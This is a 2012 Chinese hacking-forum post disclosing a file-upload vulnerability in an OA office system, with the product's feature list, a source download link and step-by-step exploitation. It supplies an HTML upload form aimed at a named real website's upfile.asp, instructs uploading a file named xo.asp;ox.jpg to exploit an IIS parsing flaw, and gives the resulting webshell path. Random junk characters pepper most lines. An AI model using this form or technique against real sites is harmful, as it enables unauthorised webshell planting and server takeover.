找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2223|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
8 v# h" e: c6 a- O8 Z; Z* e  P& \
+ Y  }9 x) U$ X6 }+ K1 {6 ?3 T系统介绍:* R0 l7 {( v$ ^7 n9 ~. n

1 Z: z( o6 i1 u6 K0 I* r& A- q全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
8 M/ {! p& ^3 j
5 ?0 I' h2 P- p  C: l. a! D主要功能:4 a8 m; @9 x% g& Q0 x9 k* y" m
公司通告
% l3 e, `) y) v5 d3 u' _工作计划
! l( R) {3 q! H/ y- }通讯助理 0 N2 ]" y/ M! _; S1 r# c; q) a
客户资源 $ V) [2 }! K. V& B5 J& l- m2 N
我的公文 2 @6 D, t( \4 c0 e/ W
公文传阅
% ]6 z6 N6 _6 C+ C公共资源 : Q+ p4 B7 L% |. z: F
资源预约 " b* f2 u3 s- I- H7 v0 P
今日考勤 - L* F/ ~$ w, W2 ]* Z
个人计划
: k# ^9 D6 `) V+ s& w6 m个人通讯录
+ f9 q1 f! l; h5 w6 J' k$ n9 G个人基本档案
5 N5 f( K* P9 {$ V' w5 W; q未读邮件
0 y. L0 c* n& d- ^: R发邮件 # F# c: J. o* E
收件夹
, M! s5 g$ ~& V$ p寄件夹 ' x; t& P, A0 k. v  F
网络硬盘
6 S) _, `$ [  ^4 D/ }网络会议 ( g! t& b3 W. V8 @
网络调查
, H5 M; ^2 U% p8 [, D9 D) h交流论坛% u; a9 F4 ]# S0 m. d

8 h1 ^3 D' w; X' c- W; j有兴趣测试的朋友可以下源码看看& I# f( j3 K- ?! W$ A( u; ~2 H; G: j
. b' f3 I5 c* y6 s. O+ k8 ^2 d
源码下载:
4 \# A* D' [5 r
) U( U  ]7 O% e1 Y: f/ xhttp://www.mycodes.net/30/4750.htm
% |, O" H$ c" o! P: M' f* y9 F
8 i  |# N& j4 V8 j$ p- X' F漏洞介绍:
. Q* J) I4 m+ G3 g; D; u+ u5 Q$ @$ m1 Q' b
由upfile.asp上传文件漏洞引起
# `4 T5 [. w$ S( N, C: q) v+ t; E. Z
测试方法:( x) {$ s; [6 }8 l7 U( |+ u0 B5 d

; m4 h/ Y( ~4 t5 Z: m+ F; M& Q使用名小子上传http://www.itlynn.com/upfile.asp即可; Z. o  _: A9 d) E7 L; _0 n6 t

  f, N3 E+ {7 @9 ^1 Z1 a6 o2 K如果upfile.asp文件被删除不存在。
8 h: p4 V* t, ~, q. r
& i$ R( ]; [$ G! N) ^* F% \- @! w  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp7 y- q+ @' {  i
2 R4 X) A, x  k3 N# y; }4 M2 n# m1 n
如果存在那么将如下代码保存为upfile.html。
2 `4 p5 {- o% @& \6 P, z: z# j! k0 K3 [" w, N8 {. q  L, C
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp9 j9 K& g* X* k5 e" d

5 p2 q3 |5 P" t1 a5 m( H+ U
' F  b& a0 I9 Q: A" z# o7 f* l7 N5 i" @3 W% ^
01 <table border='0' align="center" cellpadding="5">
9 _/ Q4 e! t" l+ y
6 [1 O4 @) W" P& E% d. ~% e02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 5 J0 G9 O; \0 Y+ s2 c# \6 ~' Q
' d: b. Y  O& u! |% B
03 <tr>
0 M+ x7 {# D  w) U; u
' V2 x$ P' f! ^1 S04             <td>报错:</td>
% W& B# _' r  W- {: v. r  D: W+ p/ T* C$ |' ]; o0 {
05             <td><input type='radio' name='errnumber' value='0'>
6 f, H5 E$ `" w2 D9 _' ?7 W$ W5 ~+ p
. a  S+ g( Q9 D! E06               自动更名 : K7 f4 r& p# X" b  p) Q' U) ?* o# ^! f

* U2 d2 I; b9 v4 g7 s8 g! v07               <input type='radio' name='errnumber' value='1' checked>
- O, B7 ~# \; s# D
% W( v" H0 a4 `) P# {4 ~08               报错方式 - m* k5 H% ^& D3 v* G# F
. A. w( Y% e% l4 T3 n: q; M
09               <input type='radio' name='errnumber' value='2'> 6 e# s/ p- \% E# h3 V8 W
8 S+ y% e  d4 Z9 t7 F2 E" B
10               直接覆盖</td>
$ ~% |6 g* N* G) @7 l2 K* [+ ^: J
4 ?. b$ o! a* X11           </tr>
: t0 \: E- F5 p7 M# Z/ h9 a% H) Q- X) i* k) }
12           <tr>
+ {& i, H, |2 S% d4 i1 P8 {  n6 P. z& @1 Z9 u3 J) m! K  i6 k
13             <td>主题:</td>
4 W7 G( U+ P' `! c! Z5 y4 v$ @: d, q5 |8 O% D: X! A
14             <td><input type='text' name='filename' size='30'></td> ) ^/ \' i' X( x+ b; T) q

6 u5 ^7 v# C6 ]: C% q15           </tr>
! Y- p1 y9 p4 I
7 S2 k) {' z1 m9 J2 ~: y- Y. `, i* c) W16           <tr> 5 ]2 T! w: B. D& B- Z# X

5 _/ e, _5 i9 z) l+ Z# U% ]/ c% V17             <td>文件:</td> % q/ s5 K! G2 C, Q8 j' f

9 T6 d1 C$ G+ y4 Y5 ^. F3 n18             <td><input type="file"name="fruit"size="30"></td>
6 N+ b) w; ^% w7 w0 S7 G1 D1 j0 Z2 |! E2 i  U
19           </tr> + B3 O2 [' d0 q' L2 h+ \! s& g" ?

" J0 ~/ O: m5 W& I  f8 F, D20           <tr>
6 ~  J6 {% G5 z( n4 H3 I# i( t9 L9 N+ z- l/ [
21             <td valign='top'>简介:</td>
( Q' w! X/ Y2 S' @1 ?+ [: U2 m" `+ Z! K% w7 u  ]; p
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> / p. q/ E- F0 v9 g5 E1 _

5 a1 j( P8 G; P+ `23           </tr>
6 ^  [5 h2 ?0 U' _5 ]
8 [6 }4 U) b; o! N7 F7 }) o24   
+ ^2 m: e% ~: Q, T8 w6 a9 Z6 Y
9 D* M& j# x3 w& s25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
% Z5 u- l( r- L2 J; {) q6 B; _4 h7 e1 B# B1 P! J9 T7 t1 {
26           </tr> & x! {) S9 _/ q/ y+ D1 g. W
9 _8 U. r1 v7 B
27         </form> , E0 Z8 V. j1 J# Z" o
: g( S- n% C5 I2 u, i! n; h9 Q7 F
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
; u1 Y+ j: L+ `# @5 C9 v  g: t% d! [, v2 g8 V

  S. g0 t5 S( W( w* ]4 E
7 ]0 a4 c. q. u$ E) ^) I( a8 C) O上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg/ u: B( e3 r3 ]- m. _4 x6 U
6 Z* O0 z3 a4 _- X- J% F( E7 z( l8 R3 {
此漏洞需要配合解析漏洞利用。" M! `5 t2 p+ H5 ?

- a& x% a9 r. `1 q  K  M4 M0 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表